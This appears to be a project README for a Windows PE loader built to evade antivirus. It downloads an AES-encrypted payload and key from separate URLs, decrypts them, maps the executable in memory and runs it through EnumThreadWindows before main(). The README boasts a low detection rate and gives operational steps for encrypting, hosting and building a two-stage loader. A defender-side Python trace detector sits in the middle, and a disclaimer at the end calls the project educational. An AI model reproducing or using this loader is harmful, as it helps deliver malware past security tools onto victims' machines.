A sophisticated portable executable (PE) loader that leverages AES encryption and remote payload fetching to bypass traditional detection methods. This loader demonstrates advanced techniques for executing native x64 binaries in memory while minimizing detection signatures.
This PE loader uses several innovative techniques to avoid detection:
- 🔒 AES Encryption: Payloads are encrypted with AES-256 for secure transmission and obfuscation
- 🌐 Remote Component Fetching: Decryption key and encrypted payload are fetched from separate URLs
- 🏗️ Constructor Execution: The payload executes via a class constructor before `main()` is called
- 🖥️ Console Removal: `FreeConsole()` detaches from the current console window
- 🧠 In-Memory Execution: Entire PE file is loaded and executed directly from memory
- 🔧 IAT Repair: Automatically repairs Import Address Table in memory
- 🛡️ API Obfuscation: Uses `EnumThreadWindows` for execution instead of more common APIs
Current detection: 1/36 (as reported by KleenScan)
- One detection marked as "Unknown"
The loader employs several advanced evasion techniques:
- 🏗️ Constructor Execution: The `init` class constructor runs before `main()`
- 🖥️ Console Removal: `FreeConsole()` detaches from the current console window
- 🌐 Remote Fetching: Downloads both encrypted payload and decryption key from separate URLs
- 🔓 AES-256 Decryption: Decrypts the payload using Windows CryptoAPI
- 🧠 PE Loading: Maps the PE into memory and handles relocations
- 🔧 IAT Repair: Rebuilds the Import Address Table by resolving all imports
- ⚡ Execution: Uses `EnumThreadWindows` to execute the entry point
This PE loader works exceptionally well when combined with my shellcode-stealth project. Together they provide:
- 🔄 Two-Stage Loading: Use shellcode-stealth as first stage to load this PE loader
- 📦 Native x64 Execution: Execute full native x64 binaries instead of just shellcode
- 🎯 Reduced Detection: Separate components across multiple stages
- 🔒 Enhanced Obfuscation: Combine Base32 encoding with AES encryption
Compile your x64 native binary or use an existing executable.
Use the provided aes_encrypt.py script to encrypt your binary:
```
python aes_encrypt.py <file.exe>
```
This will generate two files:
- `cipher.bin` (encrypted payload)
- `key.bin` (decryption key)
Upload both files to your web server:
- Host `cipher.bin` at: `<domain>/encrypted_payload.bin`
- Host `key.bin` at: `<domain>/decryption_key.bin`
Update the URLs in the code:
```cpp
std::wstring cipher_url = oxorany(L"<domain>/encrypted_payload.bin");
std::wstring key_url = oxorany(L"<domain>/decryption_key.bin");
```
Open the project in Visual Studio and build as x64 Release.
The payload executes through the `init` class constructor, which runs during static initialisation, before the `main()` function:
```cpp
#include <windows.h>

class init {
public:
    init() {
        FreeConsole(); // detach from the current console window
        // download, decrypt and execute
    }
};

// global instance: its constructor runs before main() is entered
init x;

int main() {
    return 0; // never executes
}
```
- 📦 Download Components: Fetches both encrypted payload and decryption key
- 🔓 AES Decryption: Uses Windows CryptoAPI for AES-256 decryption
- 🧠 Memory Allocation: Allocates memory at preferred image base or random address
- 🗂️ PE Mapping: Copies PE headers and sections to their proper locations
- 🔧 IAT Repair: Resolves all imports and fixes the Import Address Table
- ⚡ Execution: Calls the entry point via `EnumThreadWindows`
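A defender-side check for the execution chain listed above, added here as an example and not part of the project: it scans a constructed, normalised API trace (the event schema and the `HttpGet`, `CryptDecrypt` and `VirtualAlloc` names it keys on are assumptions) and flags a process only when the separate remote fetches, the in-process decrypt and an `EnumThreadWindows` callback pointing into self-allocated memory all line up.

```python
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class Event:
    pid: int
    api: str    # normalised API name; the sensor schema is an assumption
    args: dict

# Constructed sample trace (not from the project): 1337 follows the chain, 2001 is benign.
SAMPLE_TRACE = [
    Event(1337, "FreeConsole", {}),
    Event(1337, "HttpGet", {"url": "https://host.invalid/encrypted_payload.bin"}),
    Event(1337, "HttpGet", {"url": "https://host.invalid/decryption_key.bin"}),
    Event(1337, "CryptDecrypt", {"alg": "AES-256"}),
    Event(1337, "VirtualAlloc", {"base": 0x140000000, "size": 0x20000}),
    Event(1337, "EnumThreadWindows", {"callback": 0x140001500}),
    Event(2001, "HttpGet", {"url": "https://update.invalid/feed.json"}),
    Event(2001, "EnumThreadWindows", {"callback": 0x7FF600012000}),  # inside a loaded DLL
]

def flag_loader_chain(events):
    """Return {pid: [reasons]} for processes that fetch >= 2 distinct remote
    components, decrypt in-process, then call EnumThreadWindows with a callback
    inside self-allocated memory rather than a loaded image."""
    fetches = defaultdict(set)   # pid -> distinct URLs fetched
    decrypted = set()            # pids that called CryptDecrypt
    allocs = defaultdict(list)   # pid -> [(base, end)] of traced allocations
    detached = set()             # pids that called FreeConsole
    hits = {}
    for ev in events:
        if ev.api == "FreeConsole":
            detached.add(ev.pid)
        elif ev.api == "HttpGet":
            fetches[ev.pid].add(ev.args["url"])
        elif ev.api == "CryptDecrypt":
            decrypted.add(ev.pid)
        elif ev.api == "VirtualAlloc":
            base, size = ev.args["base"], ev.args["size"]
            allocs[ev.pid].append((base, base + size))
        elif ev.api == "EnumThreadWindows":
            cb = ev.args["callback"]
            in_private = any(lo <= cb < hi for lo, hi in allocs[ev.pid])
            if in_private and len(fetches[ev.pid]) >= 2 and ev.pid in decrypted:
                reasons = ["EnumThreadWindows callback in self-allocated memory",
                           f"{len(fetches[ev.pid])} distinct remote fetches plus in-process decrypt"]
                if ev.pid in detached:
                    reasons.append("console detached via FreeConsole")
                hits[ev.pid] = reasons
    return hits
```

Any one of these calls is common in benign software; the signal is the combination within a single process, so tune the fetch threshold and the private-memory check to your own sensor's data before alerting.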
This loader specifically supports x64 NATIVE binaries with proper:
- ✅ Relocation handling
- ✅ Import resolution
- ✅ Memory permission management
- ✅ Exception directory support (if present)
- Windows OS (x64)
- C++ Compiler (Visual Studio recommended)
- Python 3 (for aes_encrypt.py)
- Web server (for hosting encrypted components)
This tool is for educational and research purposes only. Use only on systems you own or have explicit permission to test. The authors are not responsible for any misuse of this tool.
This project is provided for educational purposes only.
⭐ If you find this project useful, please consider giving it a star on GitHub!